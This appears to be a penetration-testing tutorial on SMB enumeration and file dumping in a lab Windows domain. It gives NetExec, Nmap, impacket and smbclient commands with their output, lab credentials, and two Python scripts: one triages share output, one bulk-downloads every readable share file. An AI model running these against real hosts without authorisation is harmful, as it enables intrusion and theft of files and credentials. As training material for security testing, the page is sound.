SMB Attacks
SMB (Server Message Block) is the file, printer and named-pipe sharing protocol used by Windows systems. It listens on TCP 445 (SMB directly over TCP) and on TCP 139 (SMB over the NetBIOS session service). Enumerating an SMB service reveals the OS build, the domain, whether message signing is required, which shares exist and what the current account may do with them, and, with enough access, user accounts. It is usually the first step after a port scan of a Windows host.
NMAP: SMB Enumeration
Nmap ships NSE scripts (selected with --script) that enumerate SMB on ports 139 and 445, among them:
smb-enum-users.nse: enumerates user accounts through SAMR and LSA queries; works best with a null session or valid credentials
smb-enum-shares.nse: enumerates shares and reports whether each one is accessible anonymously or with the supplied credentials
NetExec: Shares Enumeration
Identify the shares exposed by the target. nxc (NetExec) queries the SMB service and prints every share together with the permissions the supplied account has on it. The first run below uses a bogus account with an empty password, which the host maps to Guest; the banner line also reports whether SMB signing is required and whether SMBv1 is still enabled, both worth noting before moving on.
nxc smb 10.10.10.23 -u 'a' -p '' --shares
SMB 10.10.10.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 10.10.10.23 445 BRAAVOS [+] essos.local\a: (Guest)
SMB 10.10.10.23 445 BRAAVOS [*] Enumerated shares
SMB 10.10.10.23 445 BRAAVOS Share Permissions Remark
SMB 10.10.10.23 445 BRAAVOS ----- ----------- ------
SMB 10.10.10.23 445 BRAAVOS ADMIN$ Remote Admin
SMB 10.10.10.23 445 BRAAVOS all READ,WRITE Basic RW share for all
SMB 10.10.10.23 445 BRAAVOS C$ Default share
SMB 10.10.10.23 445 BRAAVOS CertEnroll Active Directory Certificate Services share
SMB 10.10.10.23 445 BRAAVOS IPC$ Remote IPC
SMB 10.10.10.23 445 BRAAVOS public Basic Read share for all domain users
nxc smb 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --shares
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SMB 10.10.10.11 445 WINTERFELL [*] Enumerated shares
SMB 10.10.10.11 445 WINTERFELL Share Permissions Remark
SMB 10.10.10.11 445 WINTERFELL ----- ----------- ------
SMB 10.10.10.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 10.10.10.11 445 WINTERFELL C$ Default share
SMB 10.10.10.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.10.10.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 10.10.10.11 445 WINTERFELL SYSVOL READ Logon server share
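The two listings above carry more than a list of share names: the banner tells you whether signing is enforced and SMBv1 is on, the login line tells you whether the session was downgraded to Guest, and the Permissions column tells you which shares are worth spidering. The following added script (not part of NetExec, written for this page) parses raw nxc --shares output and turns those details into a short triage list. The SAMPLE text is constructed from the BRAAVOS and WINTERFELL output above; everything else is assumed, including the finding wording.

```python
"""Triage the output of `nxc smb <host> -u <user> -p <pass> --shares`.

Added example (not part of NetExec). It parses the banner line and the share
table exactly as nxc prints them and flags what to look at first: writable or
non-default readable shares, guest access, signing disabled, SMBv1 enabled.
SAMPLE below is constructed from the two listings on this page.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Shares every Windows host or DC exposes; merely listing them is not a finding.
DEFAULT_SHARES = {"ADMIN$", "C$", "IPC$", "PRINT$", "NETLOGON", "SYSVOL"}

BANNER_RE = re.compile(r"^SMB\s+(?P<host>\S+)\s+\d+\s+(?P<name>\S+)\s+\[\*\].*?"
                       r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)")
GUEST_RE = re.compile(r"\[\+\]\s+\S+\s+\(Guest\)")
# Share rows: "<share> [READ|WRITE|READ,WRITE] <remark>"; names containing spaces are not handled.
SHARE_RE = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<share>\S+)"
                      r"(?:\s+(?P<perms>(?:READ|WRITE)(?:,(?:READ|WRITE))*)(?=\s|$))?"
                      r"(?:\s+(?P<remark>.*))?$")


@dataclass
class HostReport:
    host: str
    name: str = ""
    signing: Optional[bool] = None  # None until the banner line has been seen
    smbv1: Optional[bool] = None
    guest: bool = False
    shares: dict = field(default_factory=dict)  # share name -> "READ", "READ,WRITE" or ""

    def findings(self) -> list:
        out = []
        if self.signing is False:
            out.append("SMB signing not required: NTLM relay to this host is possible")
        if self.smbv1:
            out.append("SMBv1 enabled: legacy dialect, check patch level and disable it")
        if self.guest:
            out.append("guest session accepted: shares below are reachable without a valid account")
        for share, perms in self.shares.items():
            if not perms:
                continue  # listed, but not accessible with this account
            if "WRITE" in perms:
                out.append(f"{share}: WRITE access, check for writable scripts or plant a file for hash capture")
            elif share.upper() in {"SYSVOL", "NETLOGON"}:
                out.append(f"{share}: readable, review logon scripts and GPO files for credentials")
            elif share.upper() not in DEFAULT_SHARES:
                out.append(f"{share}: READ access on a non-default share, spider it")
        return out


def parse_nxc_shares(text: str) -> dict:
    """Map host IP -> HostReport from raw nxc output; lines not starting with 'SMB ' are ignored."""
    reports = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("SMB "):
            continue
        rep = reports.setdefault(line.split()[1], HostReport(line.split()[1]))
        m = BANNER_RE.match(line)
        if m:
            rep.name, rep.signing, rep.smbv1 = m["name"], m["signing"] == "True", m["smbv1"] == "True"
            continue
        if GUEST_RE.search(line):
            rep.guest = True
            continue
        m = SHARE_RE.match(line)
        if m and not m["share"].startswith(("[", "-")) and m["share"] != "Share":
            rep.shares[m["share"]] = m["perms"] or ""
    return reports


SAMPLE = """
SMB 10.10.10.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 10.10.10.23 445 BRAAVOS [+] essos.local\\a: (Guest)
SMB 10.10.10.23 445 BRAAVOS [*] Enumerated shares
SMB 10.10.10.23 445 BRAAVOS Share Permissions Remark
SMB 10.10.10.23 445 BRAAVOS ----- ----------- ------
SMB 10.10.10.23 445 BRAAVOS ADMIN$ Remote Admin
SMB 10.10.10.23 445 BRAAVOS all READ,WRITE Basic RW share for all
SMB 10.10.10.23 445 BRAAVOS C$ Default share
SMB 10.10.10.23 445 BRAAVOS CertEnroll Active Directory Certificate Services share
SMB 10.10.10.23 445 BRAAVOS IPC$ Remote IPC
SMB 10.10.10.23 445 BRAAVOS public Basic Read share for all domain users
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL [+] north.sevenkingdoms.local\\samwell.tarly:Heartsbane
SMB 10.10.10.11 445 WINTERFELL [*] Enumerated shares
SMB 10.10.10.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 10.10.10.11 445 WINTERFELL C$ Default share
SMB 10.10.10.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.10.10.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 10.10.10.11 445 WINTERFELL SYSVOL READ Logon server share
"""

if __name__ == "__main__":
    for host, rep in parse_nxc_shares(SAMPLE).items():
        print(f"{host} ({rep.name})")
        for finding in rep.findings():
            print("  -", finding)
```

Pipe real output into it with nxc ... --shares | python3 triage.py after replacing SAMPLE with sys.stdin.read(). On the sample, BRAAVOS yields four findings (no signing, SMBv1, guest login, writable non-default share "all") while WINTERFELL only yields the two domain shares to review; shares listed without a permission, such as public and CertEnroll for the guest session, are deliberately not reported because this account cannot open them.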
NetExec: Accessing and dumping all files
List all readable files
The spider_plus module walks every share the account can read and writes a JSON inventory of the files it sees to OUTPUT_FOLDER. With the defaults shown here nothing is downloaded (DOWNLOAD_FLAG is False), print$ and IPC$ are skipped, .ico and .lnk files are ignored, and MAX_FILE_SIZE caps the files that will be fetched once downloading is turned on; module options are changed with -o KEY=VALUE.
nxc smb 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' -M spider_plus
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] STATS_FLAG: True
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.10.11 445 WINTERFELL [*] Enumerated shares
SMB 10.10.10.11 445 WINTERFELL Share Permissions Remark
SMB 10.10.10.11 445 WINTERFELL ----- ----------- ------
SMB 10.10.10.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 10.10.10.11 445 WINTERFELL C$ Default share
SMB 10.10.10.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.10.10.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 10.10.10.11 445 WINTERFELL SYSVOL READ Logon server share
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.10.11.json".
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] SMB Shares: 5 (ADMIN$, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] SMB Readable Shares: 3 (IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Total folders found: 20
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Total files found: 13
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File size average: 582 B
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File size min: 0 B
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File size max: 3.68 KB
Dumping all readable files
Setting -o DOWNLOAD_FLAG=True makes spider_plus save every file it inventoried (within MAX_FILE_SIZE and the exclusion filters) under OUTPUT_FOLDER. Check the [-] lines in the output: here one file failed because of an error inside the module, not an access problem, so it has to be fetched by hand with one of the clients below.
nxc smb 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' -M spider_plus -o DOWNLOAD_FLAG=True
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] STATS_FLAG: True
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.10.11 445 WINTERFELL [*] Enumerated shares
SMB 10.10.10.11 445 WINTERFELL Share Permissions Remark
SMB 10.10.10.11 445 WINTERFELL ----- ----------- ------
SMB 10.10.10.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 10.10.10.11 445 WINTERFELL C$ Default share
SMB 10.10.10.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.10.10.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 10.10.10.11 445 WINTERFELL SYSVOL READ Logon server share
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [-] Failed to download file "DSyXKmYorq.txt". Error: 'RemoteFile' object has no attribute 'get_filesize'
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.10.11.json".
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] SMB Shares: 5 (ADMIN$, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] SMB Readable Shares: 3 (IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Total folders found: 20
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Total files found: 13
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File size average: 582 B
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File size min: 0 B
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File size max: 3.68 KB
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File unique exts: 6 (.ps1, .txt, .cmt, .inf, .ini, .pol)
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Downloads successful: 12
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Downloads failed: 1
Impacket: Accessing and dumping SMB files
This example uses impacket-smbclient to list shares and download files with valid credentials. Giving only user@host makes the tool prompt for the password, which keeps it out of shell history and the process list. Inside the session, shares lists what is available, use selects a share, ls lists the current directory and get fetches a file into the local working directory.
impacket-smbclient samwell.tarly@10.10.10.11
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use NETLOGON
# ls
drw-rw-rw- 0 Fri Dec 5 12:43:04 2025 .
drw-rw-rw- 0 Fri Dec 5 12:43:04 2025 ..
-rw-rw-rw- 165 Sat Oct 18 16:01:29 2025 script.ps1
-rw-rw-rw- 869 Sat Oct 18 16:01:32 2025 secret.ps1
# get secret.ps1
# get script.ps1
# exit
➜ ~ ls
secret.ps1 script.ps1
SMBClient: Listing and dumping SMB files
This example uses smbclient from Samba for the same task. -L lists the shares; the SMB1 "workgroup listing" errors printed after the table are harmless on a target that has SMBv1 disabled. Note that -U user%password puts the password on the command line, where it is visible in shell history and to other local users through the process list; leave out the %password part to be prompted instead.
smbclient -L //10.10.10.11/ -U samwell.tarly%Heartsbane
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.11 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available.
smbclient //10.10.10.11/NETLOGON -U samwell.tarly%Heartsbane
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Dec 5 12:43:04 2025
.. D 0 Fri Dec 5 12:43:04 2025
script.ps1 A 165 Sat Oct 18 16:01:29 2025
secret.ps1 A 869 Sat Oct 18 16:01:32 2025
15638527 blocks of size 4096. 11305157 blocks available
smb: \> get script.ps1
getting file \script.ps1 of size 165 as script.ps1 (53.7 KiloBytes/sec) (average 53.7 KiloBytes/sec)
smb: \> get secret.ps1
getting file \secret.ps1 of size 869 as secret.ps1 (424.3 KiloBytes/sec) (average 202.0 KiloBytes/sec)
smb: \> exit
➜ ~ ls
secret.ps1 script.ps1
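Both the impacket-smbclient and the smbclient sessions above do the same thing by hand: list shares, select one, list files, fetch them. The added script below (written for this page, not Impacket's own code and not from any tool the page shows) performs that loop with impacket's SMBConnection API, applying the same kind of extension and size filters spider_plus uses, and refuses remote names that would escape the output directory, which matters when the "share" belongs to a rogue server. dump_host() needs impacket installed and a reachable host and is therefore not exercised offline; FakeSMB is a constructed in-memory stand-in that exposes the same three methods (listPath, getFile and the SharedFile accessors) so the walk, filter and download logic can be run and checked without a target. SAMPLE_TREE is constructed; the two .ps1 sizes mirror the NETLOGON listing above.

```python
"""Walk a share and pull its files with impacket's SMBConnection API.

Added example, not Impacket's code and not from the page. It scripts the
interactive sessions above (shares, use, ls, get) with spider_plus-style
filters (skip .ico/.lnk and files over 50 KB). dump_host() needs impacket and
a reachable host; FakeSMB is a constructed stand-in with the same methods so
the walk, filter and download logic runs offline.
"""
import os
import tempfile

SKIP_EXTS = {".ico", ".lnk"}
MAX_SIZE = 50 * 1024  # bytes, the spider_plus default


def walk_share(conn, share, path="\\"):
    """(remote_path, size) for every file below path. Uses conn.listPath(share, pattern)
    and the impacket SharedFile accessors get_longname/is_directory/get_filesize."""
    base = path.rstrip("\\")
    files = []
    for entry in conn.listPath(share, base + "\\*"):
        name = entry.get_longname()
        if name in (".", ".."):
            continue
        if entry.is_directory():
            files.extend(walk_share(conn, share, base + "\\" + name))
        else:
            files.append((base + "\\" + name, entry.get_filesize()))
    return files


def select_downloads(files, max_size=MAX_SIZE, skip_exts=SKIP_EXTS):
    """Keep the files that pass the size and extension filters."""
    return [(p, s) for p, s in files
            if s <= max_size and os.path.splitext(p)[1].lower() not in skip_exts]


def download(conn, share, remote, out_dir):
    """Fetch one file with conn.getFile() into out_dir/<share>/<path>; returns bytes written."""
    parts = remote.strip("\\").split("\\")
    if any(p in ("", ".", "..") for p in parts):  # a rogue server can return traversal names
        raise ValueError(f"refusing suspicious remote path {remote!r}")
    local = os.path.join(out_dir, share, *parts)
    os.makedirs(os.path.dirname(local), exist_ok=True)
    with open(local, "wb") as fh:
        conn.getFile(share, remote, fh.write)
    return os.path.getsize(local)


def dump_host(host, user, password, domain, out_dir):
    """Log in, walk every listed share and download what passes the filters (needs impacket)."""
    from impacket.smbconnection import SMBConnection  # pip install impacket
    conn = SMBConnection(host, host)
    conn.login(user, password, domain)
    saved = []
    for share in conn.listShares():
        name = share["shi1_netname"][:-1]  # impacket keeps the trailing NUL
        try:
            files = walk_share(conn, name)
        except Exception as exc:  # e.g. STATUS_ACCESS_DENIED on ADMIN$ or C$
            print(f"[-] {name}: {exc}")
            continue
        for remote, _ in select_downloads(files):
            download(conn, name, remote, out_dir)
            saved.append(name + remote)
    conn.logoff()
    return saved


class _Entry:
    """Minimal impacket SharedFile look-alike returned by FakeSMB.listPath()."""
    def __init__(self, name, node): self._name, self._node = name, node
    def get_longname(self): return self._name
    def is_directory(self): return isinstance(self._node, dict)
    def get_filesize(self): return 0 if self.is_directory() else len(self._node)


class FakeSMB:
    """Constructed in-memory stand-in: nested dicts are directories, bytes are files."""
    def __init__(self, shares): self.shares = shares
    def _node(self, share, path):
        node = self.shares[share]
        for part in path.strip("\\").split("\\"):
            if part: node = node[part]
        return node
    def listPath(self, share, pattern):  # pattern ends in "\*", as impacket expects
        d = self._node(share, pattern[:-2])
        return [_Entry(".", {}), _Entry("..", {})] + [_Entry(n, v) for n, v in d.items()]
    def getFile(self, share, path, callback): callback(self._node(share, path))


# Constructed tree; the two .ps1 sizes mirror the NETLOGON listing on this page.
SAMPLE_TREE = {"NETLOGON": {"script.ps1": b"W" * 165, "secret.ps1": b"S" * 869,
               "policies": {"icon.ico": b"\x00" * 10, "backup.bin": b"\x00" * 60 * 1024}}}


def dry_run(out_dir=None):
    """walk -> filter -> download against FakeSMB; returns [(remote, bytes_written)]."""
    out_dir = out_dir or tempfile.mkdtemp(prefix="smbdump_")
    fake = FakeSMB(SAMPLE_TREE)
    return [(r, download(fake, "NETLOGON", r, out_dir))
            for r, _ in select_downloads(walk_share(fake, "NETLOGON"))]


if __name__ == "__main__":
    for remote, n in dry_run():
        print(f"[+] NETLOGON{remote} ({n} bytes)")
```

Against the fake tree, icon.ico is dropped by extension and backup.bin by size, so only the two .ps1 files are written, exactly what the manual get commands above retrieved. Against a real host, call dump_host("10.10.10.11", "samwell.tarly", password, "north.sevenkingdoms.local", "loot"); shares the account cannot open (ADMIN$, C$) raise on listPath and are reported with a [-] line rather than aborting the run.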